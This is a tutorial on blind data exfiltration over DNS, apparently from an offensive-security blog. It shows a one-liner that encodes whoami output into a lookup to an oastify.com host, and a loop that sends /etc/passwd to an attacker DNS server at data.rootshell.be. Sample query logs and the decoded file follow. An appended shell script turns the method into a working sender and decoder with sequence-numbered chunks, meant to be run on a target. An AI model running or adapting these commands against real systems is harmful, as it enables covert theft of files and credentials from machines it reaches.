
Blind Data Exfiltration via DNS

Here’s our bash command:

a=$(whoami|base32|tr -d =);nslookup $a.3EjvJTTf7HVHax6woyRfKkmKFxbW1Cv4z6.oastify.com

Let’s break it down. First, a=$(whoami|base32|tr -d =):

- The dollar sign and parentheses, $(…), run a command (or a pipeline of commands) and store its output in a variable (a, in this case).
- Run whoami (output is www-data).
- Pipe that to base32 (output is O53XOLLEMF2GCCQ=; the trailing newline that whoami prints is encoded as well, so you get it back when you decode).
- tr -d = deletes the "=" padding sign, so the label only contains letters and digits.
- $a now contains O53XOLLEMF2GCCQ.

Then run:

nslookup O53XOLLEMF2GCCQ.3EjvJTTf7HVHax6woyRfKkmKFxbW1Cv4z6.oastify.com

If you do not have a domain of your own, Burp Collaborator gives you one (the oastify.com name above) and shows you the queries it receives, including the encoded label.

You can also automate this with a loop to get longer files and more info. A single DNS label can be at most 63 characters (the whole name at most 253), so base32 -w 63 wraps the encoded data at exactly one label per line; base32 output only uses A-Z and 2-7, plus "=" padding at the very end, so every line is safe to put in a name. Two caveats for longer transfers: a resolver may retry a query (so the same chunk appears twice in the log), and it may answer a repeated chunk from its cache without asking your server at all (so a repeated 63-character chunk goes missing). For anything more than a handful of chunks, prefix each one with a sequence number so the receiver can deduplicate and reorder.

# base32-encode the file, 63 characters per line (one DNS label each),
# and send every line as a subdomain lookup to the attacker's DNS server
cat /etc/passwd | base32 -w 63 | while read -r L
do
     dig "$L.data.rootshell.be" @192.168.254.8
done

Here is what the DNS logs would look like:

$ grep 'data.rootshell.be' queries.log
20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query: OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.113 queries: info: client 172.x.x.x#50081: query: YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.173 queries: info: client 172.x.x.x#40457: query: QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.222 queries: info: client 172.x.x.x#56897: query: 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be IN A +E (192.168.254.8)
20-Apr-2017 08:32:11.276 queries: info: client 172.x.x.x#57339: query: GOTYHI2DUNRVGUZTIOTTPFXGGORPMJUW4ORPMJUW4L3TPFXGGCTHMFWWK4Z2PA5.data.rootshell.be IN A +E (192.168.254.8)

...

And here’s the decoded /etc/passwd file:

$ grep 'data.rootshell.be' queries.log | cut -d ' ' -f8 | cut -d '.' -f1 | base32 -d | more
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
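Both halves of the procedure above, the sending loop and the log decoder, as an added example that is not code from the original post. It generalises the loop to a sequence-numbered layout that survives resolver retries, duplicate queries and case randomisation, and the decoder reorders and deduplicates on that number before feeding base32 -d. The zone data.rootshell.be, the server 192.168.254.8 and the BIND log format are the post's; the function names, the demo data and the constructed log lines are assumptions made here.

```shell
#!/bin/sh
# Added example, not code from the original post. Sender and receiver for
# sequence-numbered DNS exfiltration. Assumes coreutils (base32, sort, cut,
# tr) and the post's hypothetical attacker zone data.rootshell.be; the log
# lines it constructs mimic the BIND query log format shown on the page.

ZONE="data.rootshell.be"

# dns_chunks FILE: print one query name per line. Each 63-character base32
# chunk (the maximum length of one DNS label) gets its own 4-digit sequence
# label in front, so retried queries and reordering cannot corrupt the
# reassembled file. The '=' padding only appears on the last chunk and is
# kept, because base32 -d needs it to decode the tail.
dns_chunks() {
    n=0
    base32 -w 63 "$1" | while read -r chunk; do
        printf '%04d.%s.%s\n' "$n" "$chunk" "$ZONE"
        n=$((n + 1))
    done
}

# dns_send FILE: what you would run on the target, one lookup per chunk.
dns_send() {
    dns_chunks "$1" | while read -r name; do
        dig "$name" @192.168.254.8 >/dev/null
    done
}

# dns_decode LOGFILE: reassemble the file from query-log lines. Case is
# normalised first because some resolvers randomise it (0x20 encoding) and
# base32 -d only accepts the upper-case alphabet; sort -u on the numeric
# sequence key drops retried duplicates and restores the original order.
dns_decode() {
    zone_uc=$(printf '%s' "$ZONE" | tr a-z A-Z)
    tr a-z A-Z < "$1" \
        | grep -o "[^ ]*\.$zone_uc" \
        | sed "s/\.$zone_uc\$//" \
        | sort -t . -k1,1n -u \
        | cut -d . -f2 \
        | base32 -d
}

# fake_log_line NAME: constructed BIND-style query-log line for offline
# testing; not real captured data.
fake_log_line() {
    printf '20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query: %s IN A +E (192.168.254.8)\n' "$1"
}

# demo: round-trip a constructed passwd fragment through a log that has the
# chunks in reverse order plus one retried copy in lower case. Returns 0
# when the decoded output matches the input byte for byte.
demo() {
    tmp=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n' > "$tmp/passwd"
    dns_chunks "$tmp/passwd" > "$tmp/names"
    {
        sed -n '2p' "$tmp/names" | tr A-Z a-z | while read -r name; do fake_log_line "$name"; done
        sort -r "$tmp/names" | while read -r name; do fake_log_line "$name"; done
    } > "$tmp/queries.log"
    dns_decode "$tmp/queries.log" > "$tmp/out"
    if cmp -s "$tmp/passwd" "$tmp/out"; then rc=0; else rc=1; fi
    rm -rf "$tmp"
    return "$rc"
}

if [ "${1:-}" = "demo" ]; then
    demo && echo "round trip OK"
fi
```

Run it as `sh exfil.sh demo` to see the round trip; on a target you would call dns_send with the file to pull, and on the receiving side dns_decode against the resolver's query log. The sequence label costs five characters per query, which is cheap next to the 63-character payload and is what makes the decoder independent of the order and number of times each chunk reaches the log.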
